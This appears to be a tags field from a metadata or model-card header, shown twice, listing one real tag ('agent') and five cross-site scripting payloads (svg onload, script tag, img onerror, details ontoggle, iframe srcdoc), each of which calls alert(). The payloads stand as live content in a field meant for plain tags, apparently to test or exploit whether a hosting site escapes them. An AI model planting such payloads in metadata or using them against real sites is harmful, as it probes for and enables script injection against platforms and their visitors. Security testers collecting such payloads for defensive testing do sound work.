| tags: | |
| - agent | |
| - <svg onload=alert('XSS via tags')> | |
| - <script>alert('XSS Attack!')</script> | |
| - <img src=x onerror="alert('XSS via img tag')"> | |
| - <details open ontoggle=alert('XSS')> | |
| - <iframe srcdoc="<script>alert('XSS')</script>"> | |
| tags: | |
| - agent | |
| - <svg onload=alert('XSS via tags')> | |
| - <script>alert('XSS Attack!')</script> | |
| - <img src=x onerror="alert('XSS via img tag')"> | |
| - <details open ontoggle=alert('XSS')> | |
| - <iframe srcdoc="<script>alert('XSS')</script>"> | |